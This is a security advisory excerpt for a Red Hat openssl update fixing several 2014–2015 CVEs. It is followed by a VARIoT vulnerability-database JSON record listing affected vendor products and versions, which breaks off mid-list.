x86_64: openssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm openssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm openssl-devel-1.0.1e-34.el7_0.7.i686.rpm openssl-devel-1.0.1e-34.el7_0.7.x86_64.rpm openssl-perl-1.0.1e-34.el7_0.7.x86_64.rpm openssl-static-1.0.1e-34.el7_0.7.i686.rpm openssl-static-1.0.1e-34.el7_0.7.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source: openssl-1.0.1e-34.el7_0.7.src.rpm
ppc64: openssl-1.0.1e-34.el7_0.7.ppc64.rpm openssl-debuginfo-1.0.1e-34.el7_0.7.ppc.rpm openssl-debuginfo-1.0.1e-34.el7_0.7.ppc64.rpm openssl-devel-1.0.1e-34.el7_0.7.ppc.rpm openssl-devel-1.0.1e-34.el7_0.7.ppc64.rpm openssl-libs-1.0.1e-34.el7_0.7.ppc.rpm openssl-libs-1.0.1e-34.el7_0.7.ppc64.rpm
s390x: openssl-1.0.1e-34.el7_0.7.s390x.rpm openssl-debuginfo-1.0.1e-34.el7_0.7.s390.rpm openssl-debuginfo-1.0.1e-34.el7_0.7.s390x.rpm openssl-devel-1.0.1e-34.el7_0.7.s390.rpm openssl-devel-1.0.1e-34.el7_0.7.s390x.rpm openssl-libs-1.0.1e-34.el7_0.7.s390.rpm openssl-libs-1.0.1e-34.el7_0.7.s390x.rpm
x86_64: openssl-1.0.1e-34.el7_0.7.x86_64.rpm openssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm openssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm openssl-devel-1.0.1e-34.el7_0.7.i686.rpm openssl-devel-1.0.1e-34.el7_0.7.x86_64.rpm openssl-libs-1.0.1e-34.el7_0.7.i686.rpm openssl-libs-1.0.1e-34.el7_0.7.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 7):
ppc64: openssl-debuginfo-1.0.1e-34.el7_0.7.ppc.rpm openssl-debuginfo-1.0.1e-34.el7_0.7.ppc64.rpm openssl-perl-1.0.1e-34.el7_0.7.ppc64.rpm openssl-static-1.0.1e-34.el7_0.7.ppc.rpm openssl-static-1.0.1e-34.el7_0.7.ppc64.rpm
s390x: openssl-debuginfo-1.0.1e-34.el7_0.7.s390.rpm openssl-debuginfo-1.0.1e-34.el7_0.7.s390x.rpm openssl-perl-1.0.1e-34.el7_0.7.s390x.rpm openssl-static-1.0.1e-34.el7_0.7.s390.rpm openssl-static-1.0.1e-34.el7_0.7.s390x.rpm
x86_64: openssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm openssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm openssl-perl-1.0.1e-34.el7_0.7.x86_64.rpm openssl-static-1.0.1e-34.el7_0.7.i686.rpm openssl-static-1.0.1e-34.el7_0.7.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 7):
Source: openssl-1.0.1e-34.el7_0.7.src.rpm
x86_64: openssl-1.0.1e-34.el7_0.7.x86_64.rpm openssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm openssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm openssl-devel-1.0.1e-34.el7_0.7.i686.rpm openssl-devel-1.0.1e-34.el7_0.7.x86_64.rpm openssl-libs-1.0.1e-34.el7_0.7.i686.rpm openssl-libs-1.0.1e-34.el7_0.7.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 7):
x86_64: openssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm openssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm openssl-perl-1.0.1e-34.el7_0.7.x86_64.rpm openssl-static-1.0.1e-34.el7_0.7.i686.rpm openssl-static-1.0.1e-34.el7_0.7.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2014-3570 https://access.redhat.com/security/cve/CVE-2014-3571 https://access.redhat.com/security/cve/CVE-2014-3572 https://access.redhat.com/security/cve/CVE-2014-8275 https://access.redhat.com/security/cve/CVE-2015-0204 https://access.redhat.com/security/cve/CVE-2015-0205 https://access.redhat.com/security/cve/CVE-2015-0206 https://access.redhat.com/security/updates/classification/#moderate https://www.openssl.org/news/secadv_20150108.txt
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2015 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iD8DBQFUwCWMXlSAg2UNWIIRAioBAJ4/RjG4OGXzCwg+PJJWNqyvahe3rQCeNE+X ENFobdxQdJ+gVAiRe8Qf54A= =wyAg -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201501-0436", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "powerlinux 7r2", "scope": "eq", "trust": 1.2, "vendor": "ibm", "version": "0" }, { "model": "communications core session manager", "scope": "eq", "trust": 1.1, "vendor": "oracle", "version": "7.3.5" }, { "model": "communications core session manager", "scope": "eq", "trust": 1.1, "vendor": "oracle", "version": "7.2.5" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0d" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0m" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0n" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0o" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0h" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1b" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0a" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1g" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0j" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0g" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0b" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1e" }, { "model": "openssl", "scope": "lte", "trust": 1.0, "vendor": "openssl", "version": "0.9.8zc" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1h" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1j" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1a" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1c" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1f" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0f" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0e" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0i" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0c" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1d" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1i" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0l" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0k" }, { "model": "power", "scope": "eq", "trust": 0.9, "vendor": "ibm", "version": "7200" }, { "model": "power", "scope": "eq", "trust": 0.9, "vendor": "ibm", "version": "7700" }, { "model": "power", "scope": "eq", "trust": 0.9, "vendor": "ibm", "version": "7800" }, { "model": "power", "scope": "eq", "trust": 0.9, "vendor": "ibm", "version": "7100" }, { "model": "hp thinpro linux", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "(arm) 4.1" }, { "model": "sparc enterprise m3000 server", "scope": null, "trust": 0.8, "vendor": "oracle", "version": null }, { "model": "hp thinpro linux", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "(arm) 4.3" }, { "model": "mac os x", "scope": "eq", "trust": 0.8, "vendor": "apple", "version": "10.9.5" }, { "model": "sparc enterprise m5000 server", "scope": null, "trust": 0.8, "vendor": "oracle", "version": null }, { "model": "hp icewall sso", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "agent 8.0" }, { "model": "sparc enterprise m9000 server", "scope": null, "trust": 0.8, "vendor": "oracle", "version": null }, { "model": "hp icewall sso", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "dfw 8.0" }, { "model": "hp thinpro linux", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "(x86) 4.2" }, { "model": "xcp", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "2260" }, { "model": "sparc enterprise m4000 server", "scope": null, "trust": 0.8, "vendor": "oracle", "version": null }, { "model": "hp thinpro linux", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "(x86) 5.0" }, { "model": "mac os x", "scope": "eq", "trust": 0.8, "vendor": "apple", "version": "10.8.5" }, { "model": "virtualization", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "of oracle secure global desktop 4.63" }, { "model": "fusion middleware", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "of oracle mobile security suite mss 3.0" }, { "model": "solaris", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "11.2" }, { "model": "virtualization", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "of oracle secure global desktop 4.71" }, { "model": "hp icewall sso", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "agent 8.0 2007 update release 2" }, { "model": "hp icewall sso", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "dfw 8.0 r3" }, { "model": "openssl", "scope": "eq", "trust": 0.8, "vendor": "openssl", "version": "1.0.0p" }, { "model": "hp icewall sso", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "dfw 8.0 r2" }, { "model": "hp icewall mcrp", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "3.0" }, { "model": "openssl", "scope": "lt", "trust": 0.8, "vendor": "openssl", "version": "1.0.1" }, { "model": "xcp", "scope": "lt", "trust": 0.8, "vendor": "oracle", "version": "(sparc enterprise m3000/m4000/m5000/m8000/m9000 server )" }, { "model": "openssl", "scope": "lt", "trust": 0.8, "vendor": "openssl", "version": "1.0.0" }, { "model": "hp thinpro linux", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "(x86) 4.1" }, { "model": "mysql", "scope": "lte", "trust": 0.8, "vendor": "oracle", "version": "5.6.22 and earlier" }, { "model": "hp thinpro linux", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "(x86) 4.4" }, { "model": "hp thinpro linux", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "(arm) 4.4" }, { "model": "hp icewall sso", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "dfw 8.0 r1" }, { "model": "hp thinpro linux", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "(arm) 4.2" }, { "model": "hp icewall sso", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "dfw 10.0" }, { "model": "hp thinpro linux", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "(x86) 4.3" }, { "model": "xcp", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "1120" }, { "model": "hp thinpro linux", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "(x86) 5.1" }, { "model": "mac os x", "scope": "eq", "trust": 0.8, "vendor": "apple", "version": "10.10 to 10.10.2" }, { "model": "openssl", "scope": "eq", "trust": 0.8, "vendor": "openssl", "version": "1.0.1k" }, { "model": "hp icewall mcrp", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "2.1" }, { "model": "xcp", "scope": "lt", "trust": 0.8, "vendor": "oracle", "version": "(fujitsu m10-1/m10-4/m10-4s server )" }, { "model": "sparc enterprise m8000 server", "scope": null, "trust": 0.8, "vendor": "oracle", "version": null }, { "model": "virtualization", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "of oracle secure global desktop 5.1" }, { "model": "power", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "7400" }, { "model": "power express", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "5200" }, { "model": "paging server", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "power", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "5700" }, { "model": "power", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "7300" }, { "model": "powerlinux 7r1", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.6, "vendor": "hp", "version": "7.4" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.1" }, { "model": "cognos controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50007.2.0.5" }, { "model": "mate collector", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ata series analog terminal adaptor", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1900" }, { "model": "power", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7600" }, { "model": "flex system en2092 1gb ethernet scalable switch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.8.60" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.3.1" }, { "model": "enterprise", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "6.0" }, { "model": "upward integration modules for vmware vsphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.5" }, { "model": "power system s822", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "bladecenter advanced management module 25r5778", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.10.186" }, { "model": "video surveillance series ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "30000" }, { "model": "telepresence server on virtual machine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "4.1" }, { "model": "bladecenter -s", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1948" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "783.00" }, { "model": "power express f/c", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5205635" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.2.6" }, { "model": "upward integration modules scvmm add-in", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "1.0.3" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35007.2" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.0" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "740.80" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "flex system p270 compute node", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "(7954-24x)0" }, { "model": "project openssl 0.9.8f", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "as infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "6" }, { "model": "power systems e870", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "sbr carrier", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "flex system compute node type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x22025850" }, { "model": "thinpro linux", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "4.4" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "350.50" }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.4.1.3" }, { "model": "mysql server", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6" }, { "model": "project openssl 1.0.0d", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "system m3 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x355042540" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "90000" }, { "model": "project openssl 1.0.1e", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "idataplex dx360 m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "79120" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.2" }, { "model": "insight orchestration", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.2" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.8.780" }, { "model": "project openssl 0.9.8u", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0" }, { "model": "tandberg codian isdn gw", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "32400" }, { "model": "project openssl 1.0.1a", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl b", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.2.2" }, { "model": "telepresence mcu", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "85100" }, { "model": "thinpro linux", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "(x86)4.2" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.2" }, { "model": "ip interoperability and collaboration system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl k", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "project openssl 1.0.0p", "scope": "ne", "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "edge digital media player", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3400" }, { "model": "systems insight manager 7.3.0a", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "flex system p260 compute node", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "(7895-23x)0" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.0.0" }, { "model": "project openssl 1.0.0g", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "hunk", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "6.1" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "junos os 13.3r6", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "tivoli netcool/reporter", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37006.4.19" }, { "model": "telepresence server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "70104.1" }, { "model": "prime security manager 04.8 qa08", "scope": null, "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "740.70" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "810.21" }, { "model": "ns oncommand core package", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "splunk", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "6.0.7" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1.1" }, { "model": "cognos planning interim fix", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "10.1.1.4" }, { "model": "enterprise", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "6.2" }, { "model": "splunk", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "6.1.3" }, { "model": "sametime", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.0.1" }, { "model": "project openssl 0.9.8zb", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.7" }, { "model": "netscaler t1", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.0.0-68" }, { "model": "prime license manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "splunk", "scope": "ne", "trust": 0.3, "vendor": "splunk", "version": "6.1.7" }, { "model": "system m2 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x355041980" }, { "model": "power systems 350.c0", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.1.0.842" }, { "model": "workflow for bluemix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "power", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5750" }, { "model": "linux i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "app for netapp data ontap", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "0" }, { "model": "upward integration modules for vmware vsphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1" }, { "model": "flex system manager node types", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "79550" }, { "model": "filenet system monitor", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.3.0.870" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.2" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.0.2-77" }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "telepresence te software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "linux enterprise software development kit sp3", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "real-time compression appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.9.1.11" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x350073830" }, { "model": "as infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "7" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1" }, { "model": "prime network registrar", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "8.2.2.2" }, { "model": "network configuration and change management service", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "systems insight manager sp2", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "4.2" }, { "model": "prime collaboration assurance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.0.0.840" }, { "model": "data ontap smi-s agent", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "systems insight manager sp1", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5.0" }, { "model": "telepresence content server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37001.1" }, { "model": "tandberg codian mse model", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "83200" }, { "model": "local collector appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "2.2.8" }, { "model": "power system s814", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.0.2.77" }, { "model": "project openssl 0.9.8w", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x310025820" }, { "model": "as infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "1" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "780.21" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.4" }, { "model": "service delivery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.1" }, { "model": "splunk", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "5.0.2" }, { "model": "tivoli workload scheduler for applications", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.4" }, { "model": "flex system fabric cn4093 10gb converged scalable switch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.8.60" }, { "model": "data ontap operating in 7-mode", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2.3" }, { "model": "flex system fabric en4093r 10gb scalable switch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.8.6.0" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.1.0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.0.0" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "740.40" }, { "model": "project openssl 1.0.0m", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "power systems 350.b1", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.4.1.8" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.2.27" }, { "model": "cognos planning interim fix", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "10.12" }, { "model": "business server", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "1" }, { "model": "flex system compute node type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x24087380" }, { "model": "project openssl 1.0.1g", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "power systems 350.e0", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5.0" }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "project openssl 0.9.8m", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "prime lan management solution", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "flex system fabric en4093r 10gb scalable switch", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.8.10.0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37007.2" }, { "model": "project openssl j", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "770.21" }, { "model": "wide area application services", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "alienvault", "scope": "ne", "trust": 0.3, "vendor": "alienvault", "version": "4.15.1" }, { "model": "command center appliance", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "0" }, { "model": "splunk", "scope": "ne", "trust": 0.3, "vendor": "splunk", "version": "5.0.12" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, 